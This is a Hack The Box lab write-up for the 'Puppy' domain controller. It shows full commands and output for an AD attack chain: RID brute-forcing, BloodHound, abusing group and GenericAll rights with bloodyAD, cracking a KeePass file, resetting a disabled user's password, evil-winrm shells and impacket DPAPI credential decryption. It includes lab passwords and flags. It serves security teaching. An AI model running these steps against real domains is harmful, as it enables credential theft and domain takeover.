Hackthebox: Puppy

Foued SAIDI Lv5
  2025-09-27 10:09:22 2025-09-27 10:09:22 Created   2025-09-27 10:51:02 2025-09-27 10:51:02 Updated    

Overview

Puppy is a medium-difficulty machine from Hack The Box dealing initially with an exposed SMB share where we have to add ourselves to developers group to access it, we’ll later get a kdbx file that we’ll crack and get some user credentials from it. To later abuse some excessive privileges on adam.siver which later leads us to read DPAPI secrets and get the password of an admin user to own the machine.

Puppy
Puppy

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 15:00:26Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m04s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-18T15:02:35
|_  start_date: N/A

We can see that we have some really interesting ports here. The most important thing is that this box is a domain controller (we can tell so from the 88 kerberos port).

Domain enumeration

Since we were provided with some credentials, we can use them to get users from their RIDs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --rid-brute
[*] Initializing NFS protocol database
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               498: PUPPY\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.70     445    DC               500: PUPPY\Administrator (SidTypeUser)
SMB         10.10.11.70     445    DC               501: PUPPY\Guest (SidTypeUser)
SMB         10.10.11.70     445    DC               502: PUPPY\krbtgt (SidTypeUser)
SMB         10.10.11.70     445    DC               512: PUPPY\Domain Admins (SidTypeGroup)
SMB         10.10.11.70     445    DC               513: PUPPY\Domain Users (SidTypeGroup)
SMB         10.10.11.70     445    DC               514: PUPPY\Domain Guests (SidTypeGroup)
SMB         10.10.11.70     445    DC               515: PUPPY\Domain Computers (SidTypeGroup)
SMB         10.10.11.70     445    DC               516: PUPPY\Domain Controllers (SidTypeGroup)
SMB         10.10.11.70     445    DC               517: PUPPY\Cert Publishers (SidTypeAlias)
SMB         10.10.11.70     445    DC               518: PUPPY\Schema Admins (SidTypeGroup)
SMB         10.10.11.70     445    DC               519: PUPPY\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.70     445    DC               520: PUPPY\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.70     445    DC               521: PUPPY\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.70     445    DC               522: PUPPY\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.70     445    DC               525: PUPPY\Protected Users (SidTypeGroup)
SMB         10.10.11.70     445    DC               526: PUPPY\Key Admins (SidTypeGroup)
SMB         10.10.11.70     445    DC               527: PUPPY\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.70     445    DC               553: PUPPY\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.70     445    DC               571: PUPPY\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.70     445    DC               572: PUPPY\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.70     445    DC               1000: PUPPY\DC$ (SidTypeUser)
SMB         10.10.11.70     445    DC               1101: PUPPY\DnsAdmins (SidTypeAlias)
SMB         10.10.11.70     445    DC               1102: PUPPY\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.70     445    DC               1103: PUPPY\levi.james (SidTypeUser)
SMB         10.10.11.70     445    DC               1104: PUPPY\ant.edwards (SidTypeUser)
SMB         10.10.11.70     445    DC               1105: PUPPY\adam.silver (SidTypeUser)
SMB         10.10.11.70     445    DC               1106: PUPPY\jamie.williams (SidTypeUser)
SMB         10.10.11.70     445    DC               1107: PUPPY\steph.cooper (SidTypeUser)
SMB         10.10.11.70     445    DC               1108: PUPPY\HR (SidTypeGroup)
SMB         10.10.11.70     445    DC               1109: PUPPY\SENIOR DEVS (SidTypeGroup)
SMB         10.10.11.70     445    DC               1111: PUPPY\steph.cooper_adm (SidTypeUser)
SMB         10.10.11.70     445    DC               1112: PUPPY\Access-Denied Assistance Users (SidTypeAlias)
SMB         10.10.11.70     445    DC               1113: PUPPY\DEVELOPERS (SidTypeGroup)

And we can also run bloodhound against the domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u levi.james  -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 --zip           
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.puppy.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 01M 59S
INFO: Compressing output into 20250518080341_bloodhound.zip

Also checking SMB shares, we find an interesting DEV share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.10.11.70\\ -U levi.james%'KingofAkron2025!'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      DEV-SHARE for PUPPY-DEVS
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.70 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

SMB share access

The DEV share should only be accessible to members of the DEVELOPERS group. We can see a path for it from our own user:

BloodHound
BloodHound

So let’s add levi to the group and get whats inside the share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~]
└─$ bloodyAD -d puppy.htb -u levi.james -p 'KingofAkron2025!' --host dc.puppy.htb --dc-ip 10.10.11.70 add groupMember "DEVELOPERS" levi.james
[+] levi.james added to DEVELOPERS
                                                                                                                                                                                
┌──(kali㉿kali)-[~]
└─$ smbclient  \\\\dc.puppy.htb\\DEV -U puppy.htb/levi.james
Password for [PUPPY.HTB\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Mar 23 07:07:57 2025
  ..                                  D        0  Sat Mar  8 16:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 07:09:12 2025
  Projects                            D        0  Sat Mar  8 16:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 02:25:46 2025

                5080575 blocks of size 4096. 1544684 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> cd Projects
smb: \Projects\> ls
  .                                   D        0  Sat Mar  8 16:53:36 2025
  ..                                 DR        0  Sun Mar 23 07:07:57 2025

                5080575 blocks of size 4096. 1544684 blocks available
smb: \Projects\>

We find a kdbx database. We cam use keepass2john+keepass4brute to get its decryption password:

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/keepass4brute]
└─$ ./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 69 - Estimated time remaining: 20 weeks, 4 days
[+] Current attempt: liverpool

[*] Password found: liverpool

We open the database and fetch these credentials:

1
2
3
4
5
ADAM SILVER:HJKL2025!
ANTONY C. EDWARDS:Antman2025!
JAMIE WILLIAMSON:JamieLove2025!
SAMUEL BLAKE:ILY2025!
STEVE TUCKER:Steve2025!

We can see that JAMIE, ADAM and ANT are members of the developers group AND that ANT has some interesting access:

BloodHound
BloodHound

Also SENIOR DEV members have GenericAll on ADAM.SILVER which can connect remotely to the system:

BloodHound
BloodHound

We can also note that adam.silver account is disabled:

BloodHound
BloodHound

So now lets enable his account first:

1
2
3
┌──(kali㉿kali)-[~/keepass4brute]
└─$ bloodyAD --host dc.puppy.htb -d 10.10.11.70 -u ant.edwards -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl

Change his password and fetch the user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/keepass4brute]
└─$ bloodyAD --host dc.puppy.htb -d 10.10.11.70 -u ant.edwards -p 'Antman2025!' set password adam.silver 'kujenStrongPassword123!'
[+] Password changed successfully!
                                                                                                                                                                                
┌──(kali㉿kali)-[~/keepass4brute]
└─$ evil-winrm -i dc.puppy.htb -u adam.silver -p 'kujenStrongPassword123!'                                                        
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../desktop
cat user.*Evil-WinRM* PS C:\Users\adam.silver\desktop> cat user.txt
49cdbfd4295bf3d0fa438a7ed40291ca

Privilege Escalation - DPAPI abuse

During our exfiltration process, we can see a backup folder:

1
2
3
4
5
6
*Evil-WinRM* PS C:\backups> download site-backup-2024-12-30.zip
                                        
Info: Downloading C:\backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\backups>

We can find this password inside:

1
nms-auth-config.xml.bak:        <bind-password>ChefSteph2025!</bind-password>

steph.cooper:ChefSteph2025!

We will now try to read dpapi:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download C8D69EBE9A43E9DEBF6B5FBD48B521B9
                                        
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9                   



*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> get-childitem -force


    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          3/8/2025   7:40 AM            740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs-         2/23/2025   2:36 PM             24 Preferred


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> download 556a2412-1275-4ccf-b721-e6a0b4f90407
                                        
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 to 556a2412-1275-4ccf-b721-e6a0b4f90407

And we can now attempt to decrypt it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/keepass4brute]
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
                                                                                                                                                                                
┌──(kali㉿kali)-[~/keepass4brute]
└─$ impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description : 
Unknown     : 
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

And eventually use that password to remotely connect:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/keepass4brute]
└─$ evil-winrm -i dc.puppy.htb -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'      
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd ../../administrator/desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> cat root.txt
e75a02a424d6c3f3867a215c9fb8a4f7

That was it for Puppy, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Puppy
  • Author: Foued SAIDI
  • Created at : 2025-09-27 10:09:22
  • Updated at : 2025-09-27 10:51:02
  • Link: https://kujen5.github.io/2025/09/27/Hackthebox-Puppy/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Puppy
  1. Overview
  2. Reconnaissance
  3. Domain enumeration
  4. SMB share access
  5. Privilege Escalation - DPAPI abuse